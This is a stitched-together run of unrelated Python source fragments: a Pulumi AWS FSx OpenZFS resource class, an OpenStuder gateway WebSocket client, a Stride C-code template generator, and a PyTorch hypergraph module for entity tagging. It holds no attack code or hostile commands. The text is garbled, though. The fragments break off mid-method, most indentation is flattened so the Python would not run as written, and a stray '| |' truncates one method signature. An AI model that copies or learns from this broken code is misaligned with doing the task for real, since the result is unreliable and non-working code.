vpc_id: Optional[pulumi.Input[str]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None) -> 'OpenZfsFileSystem':
"""
Get an existing OpenZfsFileSystem resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: Amazon Resource Name of the file system.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input[str] deployment_type: - The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
:param pulumi.Input[str] dns_name: DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
:param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] network_interface_ids: Set of Elastic Network Interface identifiers from which the file system is accessible. The first network interface returned is the primary network interface.
:param pulumi.Input[str] owner_id: AWS account identifier that created the file system.
        :param pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children of the root volume. See Root Volume Configuration Below.
:param pulumi.Input[str] root_volume_id: Identifier of the root volume, e.g., `fsvol-12345678`
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
        :param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet needs to be provided.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[str] vpc_id: Identifier of the Virtual Private Cloud for the file system.
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _OpenZfsFileSystemState.__new__(_OpenZfsFileSystemState)
__props__.__dict__["arn"] = arn
__props__.__dict__["automatic_backup_retention_days"] = automatic_backup_retention_days
__props__.__dict__["backup_id"] = backup_id
__props__.__dict__["copy_tags_to_backups"] = copy_tags_to_backups
__props__.__dict__["copy_tags_to_volumes"] = copy_tags_to_volumes
__props__.__dict__["daily_automatic_backup_start_time"] = daily_automatic_backup_start_time
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["disk_iops_configuration"] = disk_iops_configuration
__props__.__dict__["dns_name"] = dns_name
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["network_interface_ids"] = network_interface_ids
__props__.__dict__["owner_id"] = owner_id
__props__.__dict__["root_volume_configuration"] = root_volume_configuration
__props__.__dict__["root_volume_id"] = root_volume_id
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["storage_capacity"] = storage_capacity
__props__.__dict__["storage_type"] = storage_type
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["throughput_capacity"] = throughput_capacity
__props__.__dict__["vpc_id"] = vpc_id
__props__.__dict__["weekly_maintenance_start_time"] = weekly_maintenance_start_time
return OpenZfsFileSystem(resource_name, opts=opts, __props__=__props__)
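    # Example (sketch; the values below are illustrative assumptions, not
    # provider defaults):
    #
    #   import pulumi_aws as aws
    #
    #   fs = aws.fsx.OpenZfsFileSystem("example",
    #       storage_capacity=64,
    #       subnet_ids=["subnet-12345678"],
    #       deployment_type="SINGLE_AZ_1",
    #       throughput_capacity=64)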
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name of the file system.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="automaticBackupRetentionDays")
def automatic_backup_retention_days(self) -> pulumi.Output[Optional[int]]:
"""
The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
"""
return pulumi.get(self, "automatic_backup_retention_days")
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the source backup to create the filesystem from.
"""
return pulumi.get(self, "backup_id")
@property
@pulumi.getter(name="copyTagsToBackups")
def copy_tags_to_backups(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_backups")
@property
@pulumi.getter(name="copyTagsToVolumes")
def copy_tags_to_volumes(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_volumes")
@property
@pulumi.getter(name="dailyAutomaticBackupStartTime")
def daily_automatic_backup_start_time(self) -> pulumi.Output[str]:
"""
A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
"""
return pulumi.get(self, "daily_automatic_backup_start_time")
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Output[str]:
"""
- The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
"""
return pulumi.get(self, "deployment_type")
@property
@pulumi.getter(name="diskIopsConfiguration")
def disk_iops_configuration(self) -> pulumi.Output['outputs.OpenZfsFileSystemDiskIopsConfiguration']:
"""
The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
"""
return pulumi.get(self, "disk_iops_configuration")
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> pulumi.Output[str]:
"""
DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
"""
return pulumi.get(self, "dns_name")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> pulumi.Output[str]:
"""
ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="networkInterfaceIds")
def network_interface_ids(self) -> pulumi.Output[Sequence[str]]:
"""
        Set of Elastic Network Interface identifiers from which the file system is accessible. The first network interface returned is the primary network interface.
"""
return pulumi.get(self, "network_interface_ids")
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> pulumi.Output[str]:
"""
AWS account identifier that created the file system.
"""
return pulumi.get(self, "owner_id")
@property
@pulumi.getter(name="rootVolumeConfiguration")
def root_volume_configuration(self) -> pulumi.Output['outputs.OpenZfsFileSystemRootVolumeConfiguration']:
"""
        The configuration for the root volume of the file system. All other volumes are children of the root volume. See Root Volume Configuration Below.
"""
return pulumi.get(self, "root_volume_configuration")
@property
@pulumi.getter(name="rootVolumeId")
def root_volume_id(self) -> pulumi.Output[str]:
"""
Identifier of the root volume, e.g., `fsvol-12345678`
"""
return pulumi.get(self, "root_volume_id")
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) | |
four parameters: 1: Status of the find operation, 2: the searched ID (including wildcard character), 3: the number of properties found,
4: List of the property IDs.
"""
self.on_property_read: Optional[Callable[[str, str, Optional[any]], None]] = None
"""
Called when the property read operation started using read_property() has completed on the gateway.
The callback takes three parameters: 1: Status of the read operation, 2: the ID of the property read, 3: the value read.
"""
self.on_properties_read: Optional[Callable[[List[SIPropertyReadResult]], None]] = None
"""
Called when the multiple properties read operation started using read_properties() has completed on the gateway.
        The callback takes one parameter: 1: List of all results of the operation.
"""
self.on_property_written: Optional[Callable[[str, str], None]] = None
"""
Called when the property write operation started using write_property() has completed on the gateway.
The callback takes two parameters: 1: Status of the write operation, 2: the ID of the property written.
"""
self.on_property_subscribed: Optional[Callable[[str, str], None]] = None
"""
Called when the gateway returned the status of the property subscription requested using the subscribe_to_property() method.
The callback takes two parameters: 1: The status of the subscription, 2: The ID of the property.
"""
self.on_properties_subscribed: Optional[Callable[[List[SIPropertySubscriptionResult]], None]] = None
"""
Called when the gateway returned the status of the properties subscription requested using the subscribe_to_properties() method.
The callback takes one parameter: 1: List of statuses of individual subscription requests.
"""
self.on_property_unsubscribed: Optional[Callable[[str, str], None]] = None
"""
Called when the gateway returned the status of the property unsubscription requested using the unsubscribe_from_property() method.
The callback takes two parameters: 1: The status of the unsubscription, 2: The ID of the property.
"""
self.on_properties_unsubscribed: Optional[Callable[[List[SIPropertySubscriptionResult]], None]] = None
"""
Called when the gateway returned the status of the properties unsubscription requested using the unsubscribe_from_properties() method.
The callback takes one parameter: 1: List of statuses of individual unsubscription requests.
"""
self.on_property_updated: Optional[Callable[[str, any], None]] = None
"""
        This callback is called whenever the gateway sends a property update.
        The callback takes two parameters: 1: the ID of the property that was updated, 2: the actual value.
"""
self.on_datalog_properties_read: Optional[Callable[[SIStatus, List[str]], None]] = None
"""
Called when the datalog property list operation started using read_datalog_properties() has completed on the gateway.
        The callback takes two parameters: 1: Status of the operation, 2: List of the IDs of the properties for which data is available in the data log.
"""
self.on_datalog_read_csv: Optional[Callable[[str, str, int, str], None]] = None
"""
        Called when the datalog read operation started using read_datalog() has completed on the gateway. This version of the callback returns the data in CSV format, suitable to
        be written to a file.
        The callback takes four parameters: 1: Status of the operation, 2: ID of the property, 3: number of entries, 4: the property data in CSV format, where the first column is
        the date and time in ISO 8601 extended format and the second column contains the actual values.
"""
self.on_device_message: Optional[Callable[[SIDeviceMessage], None]] = None
"""
        This callback is called whenever the gateway sends a device message indication.
The callback takes one parameter, the device message object.
"""
self.on_messages_read: Optional[Callable[[str, Optional[int], List[SIDeviceMessage]], None]] = None
"""
Called when the gateway returned the status of the read messages operation using the read_messages() method.
The callback takes three parameters: 1: the status of the operation, 2: the number of messages retrieved, 3: the list of retrieved messages.
"""
def connect(self, host: str, port: int = 1987, user: str = None, password: str = None, background: bool = True) -> None:
"""
        Establishes the WebSocket connection to the OpenStuder gateway and, once the connection has been established, executes the user authorization process in the background.
        This method returns immediately and does not block the current thread.
        The status of the connection attempt is reported either by the on_connected() callback on success, or by the on_error() callback if the connection could not be
        established or the authorization for the given user was rejected by the gateway.
:param host: Hostname or IP address of the OpenStuder gateway to connect to.
:param port: TCP port used for the connection to the OpenStuder gateway, defaults to 1987.
        :param user: Username sent to the gateway, used for authorization.
        :param password: Password sent to the gateway, used for authorization.
        :param background: If true, the handling of the WebSocket connection is done in the background; if false, the current thread is taken over.
:raises SIProtocolError: If there was an error initiating the WebSocket connection.
"""
# Ensure that the client is in the DISCONNECTED state.
self.__ensure_in_state(SIConnectionState.DISCONNECTED)
# Save parameter for later use.
self.__user = user
self.__password = password
# Connect to WebSocket server.
self.__state = SIConnectionState.CONNECTING
self.__ws = websocket.WebSocketApp('ws://{host}:{port}'.format(host=host, port=port),
on_open=self.__on_open,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close
)
# TODO: Start connection timeout.
# If background mode is selected, start a daemon thread for the connection handling, otherwise take over current thread.
if background:
self.__thread = Thread(target=self.__ws.run_forever)
            self.__thread.daemon = True
self.__thread.start()
else:
self.__ws.run_forever()
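    # Example usage (sketch; the host, user and password below are placeholders,
    # and the callback wiring follows the attribute docs above):
    #
    #   client = SIAsyncGatewayClient()
    #   client.on_property_updated = lambda property_id, value: print(property_id, value)
    #   client.connect('gateway.local', port=1987, user='basic', password='basic')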
def set_callbacks(self, callbacks: SIAsyncGatewayClientCallbacks) -> None:
"""
Configures the client to use all callbacks of the passed abstract client callback class. Using this you can set all callbacks to be called on the given object and avoid
having to set each callback individually.
:param callbacks: Object derived from SIAsyncGatewayClientCallbacks to be used for all callbacks.
"""
if isinstance(callbacks, SIAsyncGatewayClientCallbacks):
self.on_connected = callbacks.on_connected
self.on_disconnected = callbacks.on_disconnected
self.on_error = callbacks.on_error
self.on_enumerated = callbacks.on_enumerated
self.on_description = callbacks.on_description
self.on_properties_found = callbacks.on_properties_found
self.on_property_read = callbacks.on_property_read
self.on_properties_read = callbacks.on_properties_read
self.on_property_written = callbacks.on_property_written
self.on_property_subscribed = callbacks.on_property_subscribed
self.on_properties_subscribed = callbacks.on_properties_subscribed
self.on_property_unsubscribed = callbacks.on_property_unsubscribed
self.on_properties_unsubscribed = callbacks.on_properties_unsubscribed
self.on_property_updated = callbacks.on_property_updated
self.on_datalog_properties_read = callbacks.on_datalog_properties_read
self.on_datalog_read_csv = callbacks.on_datalog_read_csv
self.on_device_message = callbacks.on_device_message
self.on_messages_read = callbacks.on_messages_read
def state(self) -> SIConnectionState:
"""
Returns the current state of the client. See **SIConnectionState** for details.
:return: Current state of the client.
"""
return self.__state
def access_level(self) -> SIAccessLevel:
"""
        Returns the access level the client has gained on the connected gateway. See **SIAccessLevel** for details.
:return: Access level granted to client.
"""
return self.__access_level
def gateway_version(self) -> str:
"""
Returns the version of the OpenStuder gateway software running on the host the client is connected to.
:return: Version of the gateway software.
"""
return self.__gateway_version
def enumerate(self) -> None:
"""
Instructs the gateway to scan every configured and functional device access driver for new devices and remove devices that do not respond anymore.
The status of the operation and the number of devices present are reported using the on_enumerated() callback.
:raises SIProtocolError: If the client is not connected or not yet authorized.
"""
# Ensure that the client is in the CONNECTED state.
self.__ensure_in_state(SIConnectionState.CONNECTED)
# Encode and send ENUMERATE message to gateway.
self.__ws.send(super(SIAsyncGatewayClient, self).encode_enumerate_frame())
def describe(self, device_access_id: str = None, device_id: str = None, property_id: int = None, flags: SIDescriptionFlags = None) -> None:
"""
This method can be used to retrieve information about the available devices and their properties from the connected gateway. Using the optional device_access_id,
device_id and property_id parameters, the method can either request information about the whole topology, a particular device access instance, a device or a property.
The flags control the level of detail in the gateway's response.
The description is reported using the on_description() callback.
:param device_access_id: Device access ID for which the description should be retrieved.
:param device_id: Device ID for which the description should be retrieved. Note that device_access_id must be present too.
:param property_id: Property ID for which the description should be retrieved. Note that device_access_id and device_id must be present too.
:param flags: Flags to control level of detail of the response.
:raises SIProtocolError: If the client is not connected or not yet authorized.
"""
# Ensure that the client is in the CONNECTED state.
self.__ensure_in_state(SIConnectionState.CONNECTED)
# Encode and send DESCRIBE message to gateway.
self.__ws.send(super(SIAsyncGatewayClient, self).encode_describe_frame(device_access_id, device_id, property_id, flags))
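    # Example describe() calls (sketch; 'demo' and 'inv' are hypothetical IDs):
    #   client.describe()                 # whole topology
    #   client.describe('demo')          # a single device access instance
    #   client.describe('demo', 'inv')   # a single device of that instance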
    def find_properties(self, property_id: str) -> None:
# Stride-Language/Stride: strideroot/library/1.0/python/BaseCTemplate.py
# -*- coding: utf-8 -*-
"""
Stride is licensed under the terms of the 3-clause BSD license.
Copyright (C) 2017. The Regents of the University of California.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
Authors: <NAME> and <NAME>
"""
from __future__ import print_function
try:
    unicode_exists_test = type('a') == unicode
except NameError:
    unicode = str  # for Python 3
import re
class BaseCTemplate(object):
def __init__(self):
self.properties = {}
self.included = [] # Accumulates include statements
self.rate_stack = []
self.rate_nested = 0
self.rate_counter = 0
self.domain_rate = None
self.str_true = "true"
self.str_false = "false"
self.stream_begin_code = '// Starting stream %02i -------------------------\n ' #{\n'
# self.stream_end_code = '} // Stream End %02i\n'
self.stream_end_code = '// Stream End %02i'
self.string_type = "std::string"
self.real_type = 'float'
self.real_postfix = 'f'
self.bool_type = 'bool'
self.int_type = 'int'
# Internal templates
self.str_rate_begin_code = '{ // Start new rate %f old: %f\n'
self.str_rate_end_code = '\n} // Close Rate %i\n'
self.str_assignment = '%s = %s;\n'
self.str_increment = '%s += %s;\n'
self.str_module_declaration = '''
class %s {
public:
%s
%s(%s) {
%s
}
%s
};
'''
self.str_function_declaration = '''%s %s(%s) {
%s
}
'''
self.str_while_declaration = '''while (%s) {
%s
}
'''
def process_code(self, code):
''' This function should be overridden to do text replacement for hardware properties '''
return code
def source_marker(self, line, filename):
if line == -1:
marker = ''
else:
marker = "//#line " + str(line) + ' "' + filename + '"\n'
return marker
    def number_to_string(self, number):
        if type(number) == int:
            s = '%i;\n' % number
        elif type(number) == float:
            s = '%.8f;\n' % number
        else:
            raise ValueError(u"Unsupported type '%s' in assignment." % type(number).__name__)
        return s
def get_platform_initialization_code(self, code, token_names, num_inputs, out_tokens, bundle_index = -1):
p = re.compile("%%intoken:[a-zA-Z0-9_]+%%") ## TODO tweak this better
matches = p.findall(code)
if num_inputs > 0: # has inputs
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for match in matches:
index = int(match[match.rfind(":") + 1:-2])
code = code.replace(match, token_names[index])
code = code.replace('%%bundle_index%%', str(bundle_index))
else: # Output only
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for token in out_tokens:
code = code.replace('%%token%%', token)
return code
def get_platform_preprocessing_code(self, code, token_names, num_inputs, out_tokens, bundle_index = -1):
p = re.compile("%%intoken:[a-zA-Z0-9_]+%%") ## TODO tweak this better
matches = p.findall(code)
if num_inputs > 0: # has inputs
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for match in matches:
index = int(match[match.rfind(":") + 1:-2])
code = code.replace(match, token_names[index])
code = code.replace('%%bundle_index%%', str(bundle_index))
else: # Output only
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for token in out_tokens:
code = code.replace('%%token%%', token)
return code
def get_platform_postprocessing_code(self, code, token_names, num_inputs, out_tokens, bundle_index = -1):
p = re.compile("%%intoken:[a-zA-Z0-9_]+%%") ## TODO tweak this better
matches = p.findall(code)
if num_inputs > 0: # has inputs
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for match in matches:
index = int(match[match.rfind(":") + 1:-2])
code = code.replace(match, token_names[index])
code = code.replace('%%bundle_index%%', str(bundle_index))
else: # Output only
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for token in out_tokens:
code = code.replace('%%token%%', token)
return code
    def get_platform_inline_processing_code(self, code, token_names, num_inputs, num_outputs, bundle_index = -1, prop_tokens = {}):
        # prop_tokens is accepted here (currently unused in this base template) so
        # that get_platform_processing_code below can forward it without a TypeError.
p = re.compile("%%intoken:[a-zA-Z0-9_]+%%") ## TODO tweak this better
matches = p.findall(code)
if num_inputs > 0: # has inputs
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
for match in matches:
index = int(match[match.rfind(":") + 1:-2])
code = code.replace(match, token_names[index])
code = code.replace('%%bundle_index%%', str(bundle_index))
else: # Output only
if bundle_index >= 0:
code = code.replace('%%bundle_index%%', str(bundle_index))
return code
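    # Example (sketch): with code = 'out = %%intoken:0%% * 0.5;', token_names =
    # ['in_sig'] and num_inputs = 1, the %%intoken:0%% marker is replaced by
    # token_names[0], yielding 'out = in_sig * 0.5;'.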
def get_platform_processing_code(self, code, token_names, handle, num_inputs, num_outputs, bundle_index = -1, prop_tokens = {}):
code = self.get_platform_inline_processing_code(code, token_names, num_inputs, num_outputs,
bundle_index, prop_tokens)
if num_outputs > 0:
code = code.replace('%%token%%', handle)
return code
def declaration_bundle_real(self, name, size, close=True):
declaration = self.real_type + " %s[%i]"%(name, size)
if close:
declaration += ';\n'
return declaration
def declaration_bundle_int(self, name, size, close=True):
declaration = self.int_type + " %s[%i]"%(name, size)
if close:
declaration += ';\n'
return declaration
def declaration_bundle_bool(self, name, size, close=True):
declaration = self.bool_type + " %s[%i]"%(name, size)
if close:
declaration += ';\n'
return declaration
def declaration_bundle_string(self, name, size, close=True):
declaration = self.string_type + " %s[%i]"%(name, size)
if close:
declaration += ';\n'
return declaration
def declaration(self, block, close=True):
declaration = ''
vartype = self.get_block_type(block)
if 'block' in block:
block = block['block']
elif 'blockbundle' in block:
block = block['blockbundle']
name = block['name']
if 'size' in block:
if vartype == 'real':
declaration = self.declaration_bundle_real(name, block['size'], close)
elif vartype == 'string':
declaration = self.declaration_bundle_string(name, block['size'],close)
elif vartype == 'bool':
declaration = self.declaration_bundle_bool(name, block['size'],close)
elif vartype == 'int':
declaration = self.declaration_bundle_int(name, block['size'],close)
else:
if vartype == 'real':
declaration = self.declaration_real(name, close)
elif vartype == 'string':
declaration = self.declaration_string(name, close)
elif vartype == 'bool':
declaration = self.declaration_bool(name, close)
elif vartype == 'int':
declaration = self.declaration_int(name, close)
return declaration
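    # Example (sketch): for a scalar block {'block': {'name': 'gain'}} whose
    # get_block_type() resolves to 'real', declaration() returns 'float gain;\n';
    # if the inner block also had 'size': 4, it would return 'float gain[4];\n'.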
def declaration_reference(self, block, close=True):
declaration = ''
vartype = self.get_block_type(block)
name = block['name']
if 'size' in block:
if vartype == 'real':
declaration = self.declaration_bundle_real(name, block['size'], close)
elif vartype == 'string':
declaration = self.declaration_bundle_string(name, block['size'],close)
elif vartype == 'bool':
declaration = self.declaration_bundle_bool(name, block['size'],close)
elif vartype == 'int':
declaration = self.declaration_bundle_int(name, block['size'],close)
else:
name = "&" + name
if vartype == 'real':
declaration = self.declaration_real(name, close)
elif vartype == 'string':
declaration = self.declaration_string(name, close)
elif vartype == 'bool':
declaration = self.declaration_bool(name, close)
elif vartype == 'int':
declaration = self.declaration_int(name, close)
return declaration
def declaration_reference_from_instance(self, instance, close=True):
declaration = ''
vartype = instance.get_type()
name = instance.get_name()
# FIXME support bundles
if vartype == 'bundle':
vartype = instance.get_bundle_type()
if vartype == 'real':
declaration = self.declaration_real(name, close)
elif vartype == 'string':
declaration = self.declaration_string(name, close)
elif vartype == 'bool':
declaration = self.declaration_bool(name, close)
elif vartype == 'int':
declaration = self.declaration_int(name, close)
declaration = self.bundle_indexing(declaration, instance.get_size())
else:
name = "&" + name
if vartype == 'real':
declaration = self.declaration_real(name, close)
elif vartype == 'string':
declaration = self.declaration_string(name, close)
elif vartype == 'bool':
declaration = self.declaration_bool(name, close)
elif vartype == 'int':
declaration = self.declaration_int(name, close)
else:
print("Unsupported type for reference:" + vartype)
return declaration
def declaration_real(self, name, close=True, default = None):
declaration = self.real_type + " " + name
if default:
declaration += ' = ' + str(default)
if close:
declaration += ';\n'
return declaration
def declaration_int(self, name, close=True, default = None):
declaration = self.int_type + " " + name
if default:
declaration += ' = ' + str(default)
if close:
declaration += ';\n'
return declaration
def declaration_bool(self, name, close=True, default = None):
declaration = self.bool_type + " " + name
if default:
declaration += ' = ' + str(default)
if close:
declaration += ';\n'
return declaration
def declaration_string(self, name, close=True, default = None):
declaration = self.string_type + " " + name
if default:
declaration += ' = ' + str(default)
if close:
declaration += ';\n'
return declaration
    def declaration_module(self, moduletype, handle, instance_consts = [],
# module/Hypergraph.py
"""
Pytorch implemenation of Hypergraph
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from typing import Dict, List
from torch.autograd import Variable
from collections import defaultdict
import pdb
def to_scalar(var):
# returns a python float
return var.view(-1).data.tolist()[0]
def argmax(vec):
# vec is only 1d vec
# return the argmax as a python int
_, idx = torch.max(vec, 0)
return to_scalar(idx)
def create_empty_var(if_gpu):
if if_gpu:
loss = Variable(torch.Tensor([0]).cuda())
else:
loss = Variable(torch.Tensor([0]))
return loss
def log_sum_exp(vec_list):
"""
Compute log sum exp in a numerically stable way for the forward algorithm
vec is n * m, norm in row
return n * 1
"""
if type(vec_list) == list:
mat = torch.stack(vec_list, 1)
else:
mat = vec_list
row, column = mat.size()
ret_l = []
for i in range(row):
vec = mat[i]
max_score = vec[argmax(vec)]
max_score_broadcast = max_score.view(-1).expand(1, vec.size()[0])
ret_l.append(max_score + \
torch.log(torch.sum(torch.exp(vec - max_score_broadcast))))
return torch.cat(ret_l, 0)
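# Sanity check (sketch): row-wise, log_sum_exp(m) for m = torch.randn(4, 7)
# should agree with the built-in stable reduction torch.logsumexp(m, dim=1),
# assuming a PyTorch version that provides both torch.logsumexp and this
# Variable-era API.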
def log_sum_exp_t(vec_A, vec_B, vec_C):
"""
vec_size: batch_size * label_size
"""
batch_size, label_size = vec_A.size()
vec_A = vec_A.view(-1, 1).squeeze(1)
vec_B = vec_B.view(-1, 1).squeeze(1)
vec_C = vec_C.view(-1, 1).squeeze(1)
vec_D = log_sum_exp([vec_A, vec_B, vec_C])
return vec_D.view(batch_size, label_size)
def log_sum_exp_b(vec_A, vec_B):
"""
vec_size: batch_size * label_size
"""
batch_size, label_size = vec_A.size()
vec_A = vec_A.view(-1, 1).squeeze(1)
vec_B = vec_B.view(-1, 1).squeeze(1)
vec_D = log_sum_exp([vec_A, vec_B])
return vec_D.view(batch_size, label_size)
class Hypergraph(nn.Module):
"""
Naive implementaion would be every instance is paired with partial tree structure.
But padding would be a problme then.
For consideration of efficiency, hypergraph is computed in batch mode.
The representation of hypergraph is A, E, T, I, X
"""
def __init__(self,
config) -> None:
super(Hypergraph, self).__init__()
self.config = config
self.label_size = config.label_size
self.C = config.C
self.hidden_size = config.semi_hidden_size
self.if_margin = config.if_margin
self.beta = config.beta
self.II_lin = nn.Linear(config.f_hidden_size * 4, self.label_size)
self.TX_lin = nn.Linear(config.f_hidden_size * 2, self.label_size)
self.IX_lin = nn.Linear(self.hidden_size * 2, self.label_size)
self.TI_lin = nn.Linear(config.f_hidden_size * 2, self.label_size)
self.f_cell = nn.LSTMCell(config.f_hidden_size * 2, config.semi_hidden_size)
self.b_cell = nn.LSTMCell(config.f_hidden_size * 2, config.semi_hidden_size)
def _gen_TX_batch(self, inputs, entity_batch):
batch_size, sent_len, feat_dim = inputs.size()
null_batch = torch.ones(batch_size, sent_len, self.label_size)
for i in range(batch_size):
for start, end, label in entity_batch[i]:
null_batch[i, start, label] = 0
ret_var = Variable(null_batch)
if self.config.if_gpu:
ret_var = ret_var.cuda()
return ret_var
def _gen_II_batch(self, inputs, entity_batch):
"""
only overlapping mentions with the same type have this kind of feature
"""
batch_size, sent_len, feat_dim = inputs.size()
if sent_len == 1:
return None
II_batch = torch.zeros(batch_size, sent_len - 1, self.label_size)
for i in range(batch_size):
start_dic = defaultdict(list)
for start, end, label in entity_batch[i]:
start_dic[(start, label)].append(end)
for (start, label), end_list in start_dic.items():
if len(end_list) > 0:
min_i = min(end_list)
max_i = max(end_list)
for j in range(start, max_i):
# It could be more than 1
II_batch[i, j, label] += 1
ret_var = Variable(II_batch)
if self.config.if_gpu:
ret_var = ret_var.cuda()
return ret_var
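    # Example (sketch): with entities (0, 2, k) and (0, 4, k) in one sentence,
    # end_list = [2, 4] for (start=0, label=k), so II_batch[i, j, k] is set for
    # j = 0..3, i.e. every position spanned by the longest of the two mentions.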
def _gen_TI_batch(self, inputs, entity_batch):
batch_size, sent_len, feat_dim = inputs.size()
TI_batch = torch.zeros(batch_size, sent_len, self.label_size)
for i in range(batch_size):
start_dic = defaultdict(list)
for start, end, label in entity_batch[i]:
start_dic[(start, label)].append(end)
for (start, label), end_list in start_dic.items():
TI_batch[i, start, label] = 1
ret_var = Variable(TI_batch)
if self.config.if_gpu:
ret_var = ret_var.cuda()
return ret_var
def _filter_entity(self, inputs, entity_batch):
batch_size, sent_len, feat_dim = inputs.size()
ret_l = []
